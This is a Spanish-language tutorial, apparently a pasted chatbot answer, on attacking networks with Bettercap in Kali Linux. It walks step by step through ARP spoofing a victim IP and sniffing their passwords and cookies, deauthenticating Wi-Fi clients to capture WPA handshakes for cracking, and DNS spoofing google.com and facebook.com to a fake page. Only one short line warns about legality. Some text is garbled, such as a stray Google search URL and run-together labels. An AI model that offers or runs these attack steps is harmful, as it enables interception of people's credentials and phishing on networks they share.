hacking kali linux bettercap
hacking kali linux bettercap
Bettercap es una de las herramientas más potentes y completas en Kali Linux para realizar auditorías de redes. A diferencia de otras herramientas más antiguas (como Ettercap), Bettercap es moderna, modular y permite atacar redes Wi-Fi, Bluetooth Low Energy (BLE), dispositivos inalámbricos (HID) y redes Ethernet.
Aquí tienes una guía esencial en español para empezar a usarlo.
1. Instalación en Kali Linux
Aunque suele venir preinstalado en las versiones "Large" de Kali, puedes instalarlo o actualizarlo fácilmente desde la terminal:
sudo apt update
sudo apt install bettercap
2. Conceptos Básicos y Consola Interactiva
Para iniciar Bettercap, simplemente escribe:
sudo bettercap
Una vez dentro, entrarás en una consola interactiva. Bettercap funciona mediante módulos que puedes activar (on) o desactivar (off).
Comandos esenciales de la consola:
help: Muestra la lista de módulos disponibles.help nombre_del_modulo: Muestra la ayuda específica y opciones de un módulo.active: Muestra qué módulos están funcionando en ese momento.quit: Salir de Bettercap.
3. Escenario Común: Ataque Man-in-the-Middle (MITM)
El uso más frecuente de Bettercap es interceptar tráfico en una red local mediante el envenenamiento de tablas ARP (ARP Spoofing).
Paso a paso para interceptar una red:
Escanear la red:
Para ver quién está conectado, activa el módulo de descubrimiento.
Plaintextnet.probe on(Esto envía paquetes para encontrar dispositivos).
Listar objetivos:
Mira la tabla de dispositivos encontrados con sus IPs y direcciones MAC.
Plaintextnet.showConfigurar el objetivo:
Si quieres atacar a una víctima específica (por ejemplo, 192.168.1.15), define el objetivo:
Plaintextset arp.spoof.targets 192.168.1.15Activar el Spoofing:
Engaña al objetivo y al router para que el tráfico pase por tu máquina.
Plaintextarp.spoof onSniffer (Captura de datos):
Para ver las contraseñas, cookies o URLs que visita la víctima:
Plaintextnet.sniff on
4. Módulos Destacados
| Módulo | Descripción |
wifi | Permite crackear WPA/WPA2, realizar ataques de desautenticación y capturar Handshakes. |
syn.scan | Escáner de puertos rápido. |
dns.spoof | Redirige a una víctima de una web real (ej. https://www.google.com/search?q=google.com) a una IP que tú controles. |
http.proxy | Permite inyectar código Javascript en el navegador de la víctima en tiempo real. |
5. La Interfaz Gráfica (Web UI)
Si prefieres no usar solo la terminal, Bettercap tiene una interfaz web muy intuitiva.
Instala la interfaz:
sudo bettercap -eval "caplets.update; ui.update; quit"Lánzala:
sudo bettercap -caplet http-uiAccede desde tu navegador a:
http://127.0.0.1Usuario por defecto:
userContraseña por defecto:
pass
[!CAUTION]
Nota de Seguridad: Utiliza esta herramienta únicamente en redes de tu propiedad o bajo consentimiento explícito. El uso de Bettercap en redes ajenas es ilegal y constituye un delito informático.
Vamos a centrarnos en dos de las tareas más comunes y potentes: Capturar un Handshake (WPA/WPA2) para crackear contraseñas Wi-Fi y realizar DNS Spoofing para redirigir tráfico.
1. Capturar un WPA Handshake (Wi-Fi)
Este proceso sirve para obtener el "saludo" entre un dispositivo y el router. Una vez capturado, puedes intentar descifrar la contraseña por fuerza bruta.
Iniciar Bettercap con tu interfaz Wi-Fi:
Bashsudo bettercap -iface wlan0Encender el módulo Wi-Fi y escanear:
Plaintextwifi.recon onVer las redes disponibles:
Plaintextwifi.showBusca el número (ID) o el BSSID de la red que quieres atacar.
Capturar el Handshake (Desautenticación):
Para obtener el handshake, necesitamos que un dispositivo se desconecte y se vuelva a conectar. Bettercap lo hace enviando paquetes de "desautenticación":
Plaintextwifi.deauth BSSID_DE_LA_REDResultado:
Si tiene éxito, Bettercap te mostrará un mensaje en pantalla confirmando que el handshake ha sido capturado y guardado en un archivo .pcap.
2. DNS Spoofing (Redirigir Sitios Web)
Este ataque hace que, cuando la víctima escriba una dirección (como www.google.com), su navegador la dirija a la IP que tú decidas (por ejemplo, tu propia IP donde tienes una página falsa).
Requisito previo: Debes estar realizando ARP Spoofing (como vimos en el mensaje anterior) para que el tráfico pase por ti.
Configurar el dominio y la IP de destino:
Plaintextset dns.spoof.domains google.com, facebook.com set dns.spoof.address 192.168.1.XX (Tu IP de Kali)Activar el módulo:
Plaintextdns.spoof onResultado:
Cuando la víctima intente entrar a esos dominios, verá el contenido que tú estés sirviendo en tu servidor local (puedes usar Apache o Nginx en Kali para esto).
3. Automatización con Caplets
Para no escribir todos los comandos cada vez, Bettercap usa archivos llamados Caplets (scripts .cap).
Puedes ver los que tienes instalados con:
caplets.showEjemplo para lanzar un ataque automático:
Bashsudo bettercap -caplet /ruta/del/archivo.cap
¿Qué sigue?
Para que el DNS Spoofing sea realmente efectivo, se suele usar junto con un servidor web falso.